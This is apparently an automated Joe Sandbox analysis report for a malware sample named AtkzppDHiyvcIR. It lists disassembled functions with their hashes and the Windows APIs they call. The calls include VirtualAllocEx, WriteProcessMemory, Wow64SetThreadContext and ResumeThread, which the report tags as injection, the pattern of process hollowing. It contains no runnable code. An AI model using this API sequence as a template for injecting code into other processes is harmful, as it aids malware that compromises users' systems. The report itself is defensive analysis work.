                                  control_flow_graph 2066 b9b300-b9b302 2067 b9b304 2066->2067 2068 b9b306-b9b308 2066->2068 2067->2068 2069 b9b30a 2068->2069 2070 b9b2b5-b9b2dd 2068->2070 2072 b9b30c-b9b30d 2069->2072 2073 b9b30e 2069->2073 2079 b9b2ec-b9b2f4 2070->2079 2080 b9b2df-b9b2ea 2070->2080 2072->2073 2074 b9b310-b9b311 2073->2074 2075 b9b312-b9b31f 2073->2075 2074->2075 2076 b9b34b-b9b34f 2075->2076 2077 b9b321-b9b32e call b9acc4 2075->2077 2082 b9b351-b9b35b 2076->2082 2083 b9b363-b9b3a4 2076->2083 2086 b9b330 2077->2086 2087 b9b344 2077->2087 2084 b9b2f7-b9b2fc 2079->2084 2080->2084 2082->2083 2090 b9b3b1-b9b3bf 2083->2090 2091 b9b3a6-b9b3ae 2083->2091 2137 b9b336 call b9b5a8 2086->2137 2138 b9b336 call b9b598 2086->2138 2139 b9b336 call b9b5fc 2086->2139 2087->2076 2092 b9b3c1-b9b3c6 2090->2092 2093 b9b3e3-b9b3e5 2090->2093 2091->2090 2095 b9b3c8-b9b3cf call b9acd0 2092->2095 2096 b9b3d1 2092->2096 2098 b9b3e8-b9b3ef 2093->2098 2094 b9b33c-b9b33e 2094->2087 2097 b9b480-b9b4fa 2094->2097 2100 b9b3d3-b9b3e1 2095->2100 2096->2100 2129 b9b4fc 2097->2129 2130 b9b4fe-b9b540 2097->2130 2101 b9b3fc-b9b403 2098->2101 2102 b9b3f1-b9b3f9 2098->2102 2100->2098 2104 b9b410-b9b419 call b9ace0 2101->2104 2105 b9b405-b9b40d 2101->2105 2102->2101 2110 b9b41b-b9b423 2104->2110 2111 b9b426-b9b42b 2104->2111 2105->2104 2110->2111 2112 b9b449-b9b44d 2111->2112 2113 b9b42d-b9b434 2111->2113 2140 b9b450 call b9b879 2112->2140 2141 b9b450 call b9b888 2112->2141 2113->2112 2115 b9b436-b9b446 call b9acf0 call b9ad00 2113->2115 2115->2112 2118 b9b453-b9b456 2120 b9b479-b9b47f 2118->2120 2121 b9b458-b9b476 2118->2121 2121->2120 2129->2130 2132 b9b548-b9b573 GetModuleHandleW 2130->2132 2133 b9b542-b9b545 2130->2133 2134 b9b57c-b9b590 2132->2134 2135 b9b575-b9b57b 2132->2135 2133->2132 2135->2134 2137->2094 2138->2094 2139->2094 2140->2118 2141->2118
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9B566
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 7b3dc833ddb23f2503f2243c07aff0785dff7c15591f2640276116752719286d
                                  • Instruction ID: 776ab36f75ecf8f446123500efabb8b4d6ce18c173ea4a166fbaf2a319a7054e
                                  • Opcode Fuzzy Hash: 7b3dc833ddb23f2503f2243c07aff0785dff7c15591f2640276116752719286d
                                  • Instruction Fuzzy Hash: 57915670A00B448FDB25CF2AE551B5ABBF1FF88300F10896AE086CBB51D735E809CB95
                                  Function 00B9590C Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: c507e2092b1d3096f4be55173b248728f3302e4c199b9b070ac66450bb1217fa
                                  • Instruction ID: f5d3fa1322dff139dca9943f026ab0fd844957aef5b4f625bfb591d9053a938d
                                  • Opcode Fuzzy Hash: c507e2092b1d3096f4be55173b248728f3302e4c199b9b070ac66450bb1217fa
                                  • Instruction Fuzzy Hash: 1741F171C00718CBEF29CFAAC88479DBBF5BF49304F2080AAD408AB255D7716946CF54
                                  Function 00B95A84 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37d031b63c0c6c7ce20604daf83da9f47f1d901f54a113e50fecd3d9ae5a8f98
                                  • Instruction ID: 75331bafbeb78a263d5e093480282a0ee34bef1a63aef6bd1e0802a6cdc318b6
                                  • Opcode Fuzzy Hash: 37d031b63c0c6c7ce20604daf83da9f47f1d901f54a113e50fecd3d9ae5a8f98
                                  • Instruction Fuzzy Hash: 4E31BF71845B48CFEF26CFA8C8857DDBBF0EF46324F2081AAC006AB252C7759946CB15
                                  Function 00B944B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 7241d2c2761feda68f8f1ee7fc0817175f3309e77e7d5e6f0e95ce9baf5040bd
                                  • Instruction ID: 0ab3f82558d4baa5ac59ebf47bd4a60ff9e4084e9badbdaf389dcb0ab5055859
                                  • Opcode Fuzzy Hash: 7241d2c2761feda68f8f1ee7fc0817175f3309e77e7d5e6f0e95ce9baf5040bd
                                  • Instruction Fuzzy Hash: BD41E070C00719CBEF25CFAAC88478EBBF5BF48304F20806AD408AB251D7756945CF94
                                  Function 07605A59 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07605AF0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: d9cf943b79b6f59974c6720cc43dc9351016587fdb54052a8e727e4cc10292d8
                                  • Instruction ID: 52b0dcc21069bff6b57c4fe8fdbbaefdaefdb599707840e3ca6769f86b1dbab4
                                  • Opcode Fuzzy Hash: d9cf943b79b6f59974c6720cc43dc9351016587fdb54052a8e727e4cc10292d8
                                  • Instruction Fuzzy Hash: EC214BB59003499FDB14CFA9C880BEEBBF5FF48310F10842AE519A7741D7799550CBA4
                                  Function 07605A60 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07605AF0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 2058c2cba835577191ef3b25ba8f141929d63395a01991750d3870a7085d81bf
                                  • Instruction ID: 4c29f3b67006aeba5c3635553469fda630157dbdfd0eb2ee1b5dd6c8de06b42a
                                  • Opcode Fuzzy Hash: 2058c2cba835577191ef3b25ba8f141929d63395a01991750d3870a7085d81bf
                                  • Instruction Fuzzy Hash: E92126B59003599FDB14CFAAC880BEEBBF5FF48310F10842AE919A7341D7789950CBA4
                                  Function 00B9D7C0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B9D84F
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: f009c9b0ab06232f646881751389b57216a164adc7dd25d275a809c09d05eb2a
                                  • Instruction ID: 1a251b52eac135263beda074977b0e3f3a4c61658e2ccd7adfeeeae5b9ef74bb
                                  • Opcode Fuzzy Hash: f009c9b0ab06232f646881751389b57216a164adc7dd25d275a809c09d05eb2a
                                  • Instruction Fuzzy Hash: 3C21D4B5900248AFDB10CFAAD484ADEBBF5FB48310F14806AE918A7351D379A944CFA5
                                  Function 076058C0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07605946
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: ad499cb058a5ba6ffbc4d0532c30ffecd5b45858364706c39b11bcdc4f3cce9a
                                  • Instruction ID: 38285b8913e94d151b5a1f3289087c96e5ba8b06fbed69480a113abaa7882bb2
                                  • Opcode Fuzzy Hash: ad499cb058a5ba6ffbc4d0532c30ffecd5b45858364706c39b11bcdc4f3cce9a
                                  • Instruction Fuzzy Hash: 3C215C75D003098FDB14DFAAC441BEEBBF4EF48220F10842AD559A7781CB789944CFA5
                                  Function 07605B48 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07605BD0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 75c783db2b3197fdceddf20452e6a1917d0e7c661fe6e8b6153faf1cfc815e8c
                                  • Instruction ID: bffbc6299a8281a3259342af858df641539cc7f1eac973ae5df026f140d983d6
                                  • Opcode Fuzzy Hash: 75c783db2b3197fdceddf20452e6a1917d0e7c661fe6e8b6153faf1cfc815e8c
                                  • Instruction Fuzzy Hash: A82136B2C003499FDB14DFAAC840BEEBBF1FF48310F10842AE519A7240D7399941CBA4
                                  Function 07605B50 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07605BD0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 5e7d510e7d6e7ef2050b0a69ce799eb2995a484a3f35c5d5f2075e33b86f3a31
                                  • Instruction ID: 294115360ede231f133c39d12c2a3f774dce66e7cb0fdf666ad56632b73af5dc
                                  • Opcode Fuzzy Hash: 5e7d510e7d6e7ef2050b0a69ce799eb2995a484a3f35c5d5f2075e33b86f3a31
                                  • Instruction Fuzzy Hash: FA2116B1C003499FDB14CFAAC840BEEBBF5FF48310F10842AE519A7240D779A550CBA5
                                  Function 076058C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07605946
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 554c48383a32bf6285046b17431390ffc5ed37c52d68edeeceb393eb6b157a7b
                                  • Instruction ID: 240d6a262b0829808db3e56fd6f7b88b5a6d3f60f72ccc3ab191ce84a1a259fd
                                  • Opcode Fuzzy Hash: 554c48383a32bf6285046b17431390ffc5ed37c52d68edeeceb393eb6b157a7b
                                  • Instruction Fuzzy Hash: 9D2138B1D003098FDB14DFAAC484BEEBBF4EF48220F14842AD559A7341CB789945CFA5
                                  Function 00B9D7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B9D84F
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: c701b3955a5e9e45d60b4df9ca9a5e34ef9df4bb07b3ed1fa170ddae6244327c
                                  • Instruction ID: f638daa0976f102db9b9645fa41d5551041ad21b9bef5376de1b867cbc8e9e21
                                  • Opcode Fuzzy Hash: c701b3955a5e9e45d60b4df9ca9a5e34ef9df4bb07b3ed1fa170ddae6244327c
                                  • Instruction Fuzzy Hash: 2B21E4B5D00248DFDB10CFAAD484ADEBBF4FB48310F14805AE918A7350D378A940CFA5
                                  Function 07605998 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07605A0E
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 0c0f4aab1db397861c3779acf21c2711ad2ccbde89b3d0c29b67579d5f9570e7
                                  • Instruction ID: db886332ae37abcc7285845568e53388818701859a01b56f57e1214fb0356d6b
                                  • Opcode Fuzzy Hash: 0c0f4aab1db397861c3779acf21c2711ad2ccbde89b3d0c29b67579d5f9570e7
                                  • Instruction Fuzzy Hash: 861158768003489FDB24CFAAC844BEEBBF5EF48320F10841AE515A7640CB769550CBA4
                                  Function 07605811 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 43a9ae060165739190f5b94082cc0863af5780de4883c01e931e439b5dcb617b
                                  • Instruction ID: a314430ed88dcc7e5075c75ff695399abc1d1a60ab3e3d25745f9832bf798867
                                  • Opcode Fuzzy Hash: 43a9ae060165739190f5b94082cc0863af5780de4883c01e931e439b5dcb617b
                                  • Instruction Fuzzy Hash: 311149B5D003488FDB24DFAAD4457EEFBF4EB88320F14841AD519A7640CA75A9448FA5
                                  Function 076059A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07605A0E
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 574acb67c6cbe5bdbf63bed1408ac3da590dae1881bc5fdc576006632f51f233
                                  • Instruction ID: f2fadab5d176929d88f49e5b3a798e8b7f566a794f0c4e65b18eda5f4e8d08f8
                                  • Opcode Fuzzy Hash: 574acb67c6cbe5bdbf63bed1408ac3da590dae1881bc5fdc576006632f51f233
                                  • Instruction Fuzzy Hash: 761167728003489FDB24CFAAC844BEFBBF5EF48310F108819E516A7250CB75A950CFA4
                                  Function 07605818 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 140227edc9c209d1b2cb8a2f7d091b16e5b6d04ccddbe60c5746dff5f78cd291
                                  • Instruction ID: d6667d8be5b3afc664417394ca299d5aae1df1e3b1856bf164dac00e9cd4ccbf
                                  • Opcode Fuzzy Hash: 140227edc9c209d1b2cb8a2f7d091b16e5b6d04ccddbe60c5746dff5f78cd291
                                  • Instruction Fuzzy Hash: 5D1128B1D003488FDB24DFAAC444BEFFBF5EF88210F148419D519A7240CA79A940CFA5
                                  Function 076090BA Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0760911D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 03340ca165fe831770d45c99cf47841eed0d43574374afdb30bce1f57fc7f3a9
                                  • Instruction ID: 5fc3c176602c3d9b801124587962a0b00c5fa45f7988865babc0fd708768d1b1
                                  • Opcode Fuzzy Hash: 03340ca165fe831770d45c99cf47841eed0d43574374afdb30bce1f57fc7f3a9
                                  • Instruction Fuzzy Hash: 321113B5800308DFDB20DF9AD885BDEFBF8EB48320F20844AE514A7640C375A544CFA5
                                  Function 00B9B500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9B566
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 15c80e03017e39f0a13cb307dd0697e736ee41dd2051b251de0f3f6177fa6c78
                                  • Instruction ID: f9f48cfff2e29a8a71ee042243648e76df64103f3fac24e34959876f8a058589
                                  • Opcode Fuzzy Hash: 15c80e03017e39f0a13cb307dd0697e736ee41dd2051b251de0f3f6177fa6c78
                                  • Instruction Fuzzy Hash: 28110FB6C00249CFDB24CF9AD544ADEFBF4EB88310F11846AD418A7210C379A545CFA5
                                  Function 07602730 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0760911D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_7600000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 777c67c1f330364e82801a17ed21cfa918d499d62be99f47fe90d15674dd2a28
                                  • Instruction ID: 1575975aac697018cd0357321370982622816b6f92fce7e7d6a57b192be3f8ad
                                  • Opcode Fuzzy Hash: 777c67c1f330364e82801a17ed21cfa918d499d62be99f47fe90d15674dd2a28
                                  • Instruction Fuzzy Hash: D611F2B5900349DFDB20DF9AC849BDEBBF8EB48320F108459E519A7341C375A944CFA5
                                  Function 072C2D98 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q
                                  • API String ID: 0-2414175341
                                  • Opcode ID: d8cdc25dc81d66d3b207365278027096ea65b238e574d42db523336e886d60c7
                                  • Instruction ID: d61113f1340a9108b22cd72c72f916801692260d0b8a18b4e9de911abf381cf6
                                  • Opcode Fuzzy Hash: d8cdc25dc81d66d3b207365278027096ea65b238e574d42db523336e886d60c7
                                  • Instruction Fuzzy Hash: 1671C4B16103069FEB25DB69D8447AEB7E6EFC8300F10892EE4069B290DF759D42C751
                                  Function 072C778F Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0,Gq
                                  • API String ID: 0-2013397073
                                  • Opcode ID: 235d7fcc44cfcdf318df047fc5d9c22f9b8056b3ce4f4dbca7ca555022c22458
                                  • Instruction ID: baaa38fd4430f7ac9466b531a9f8032b4ce90ef1e2ad5001937ce34ae9b8206f
                                  • Opcode Fuzzy Hash: 235d7fcc44cfcdf318df047fc5d9c22f9b8056b3ce4f4dbca7ca555022c22458
                                  • Instruction Fuzzy Hash: 4271E334B042059FE704EB78D455A9DBBB2EF89300F0885E9D8859F386CB346E46C782
                                  Function 072CED18 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Teq
                                  • API String ID: 0-1098410595
                                  • Opcode ID: 0fbd3e7f0cb841fe34972ae3a1fffd5428a14c31304ccb49cfb0d781c1cce7cb
                                  • Instruction ID: 1869acbfd62a9d51005902fcb77b850e5bd5f4d0189e4f5be3de821a83b121ad
                                  • Opcode Fuzzy Hash: 0fbd3e7f0cb841fe34972ae3a1fffd5428a14c31304ccb49cfb0d781c1cce7cb
                                  • Instruction Fuzzy Hash: A57104B4E24218CFDB08CFA9C984AEEBBB6FF9A300F148129D419AB354D7745945CF50
                                  Function 072C77C8 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0,Gq
                                  • API String ID: 0-2013397073
                                  • Opcode ID: a2257d3bb2c791b02b9b61fed18fabe5116ce1893676db00fd6f9126ccf76f2b
                                  • Instruction ID: d910126c1f24c32a83084fea1b2f33c9afe1e34f2c101d84b3abc953a232db40
                                  • Opcode Fuzzy Hash: a2257d3bb2c791b02b9b61fed18fabe5116ce1893676db00fd6f9126ccf76f2b
                                  • Instruction Fuzzy Hash: 3C619234B002059FD714AB68D455AAEB7B2FF88300F1489A9D8855F386CB716E86CBC6
                                  Function 072C8E68 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q
                                  • API String ID: 0-1301096350
                                  • Opcode ID: 0d5d89b949144cfa87072a8dafdcace60365227ec3d7952a9d61f4e67b26e953
                                  • Instruction ID: a7e979b35510df6be3d40a533f56aa63e4293a67f7d51aab48875a7d91539964
                                  • Opcode Fuzzy Hash: 0d5d89b949144cfa87072a8dafdcace60365227ec3d7952a9d61f4e67b26e953
                                  • Instruction Fuzzy Hash: 4111D0B0A3C6D1DFC322E66495102757BA59B73205F18C7EFF54ACB182C6BE884183A6
                                  Function 072C82C1 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q
                                  • API String ID: 0-1301096350
                                  • Opcode ID: 30e6a3af6586461743b92a77da3d6409d948f6b4ef81f693fffa3960bc6b17d4
                                  • Instruction ID: b8378713713d6b74b47c9108fb7d607a705814ada0bea422b8e7f4a48b91eb19
                                  • Opcode Fuzzy Hash: 30e6a3af6586461743b92a77da3d6409d948f6b4ef81f693fffa3960bc6b17d4
                                  • Instruction Fuzzy Hash: B4F062F1A35593CBD314CA14DA09370B7A1FB62346F05C3AF984ECB141D7B58481C79A
                                  Function 072C6D20 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: G
                                  • API String ID: 0-985283518
                                  • Opcode ID: 8b7fccdf2dc28815dd5c029f56088e713918ba21bfdd6ebfb7506f331124f2fd
                                  • Instruction ID: a0e58d79b7460b66b521097ef75af40620af0e9ecfb7d74441bc011bf9a1e629
                                  • Opcode Fuzzy Hash: 8b7fccdf2dc28815dd5c029f56088e713918ba21bfdd6ebfb7506f331124f2fd
                                  • Instruction Fuzzy Hash: 75D0A7F542C109DBD714CE74D9052BC7F6CD712208F1402DED80D46945DFA66E2097D2
                                  Function 072C6D30 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: G
                                  • API String ID: 0-985283518
                                  • Opcode ID: 3c141dc61081874cf6edec81f8c1d689a84bf349be745408068f84ca7c06b778
                                  • Instruction ID: 624249fe7610eb666b3e91898ac74a17759b45a7b219502f1300af7fe288304f
                                  • Opcode Fuzzy Hash: 3c141dc61081874cf6edec81f8c1d689a84bf349be745408068f84ca7c06b778
                                  • Instruction Fuzzy Hash: 23C08CF043810CEBC708DF84D90663CBBBCD702304F00029AE80E47600CFB12F20AA82
                                  Function 072C3478 Relevance: .5, Instructions: 453COMMON
                                  Download Yara Rule
                                  Memory Dump Source
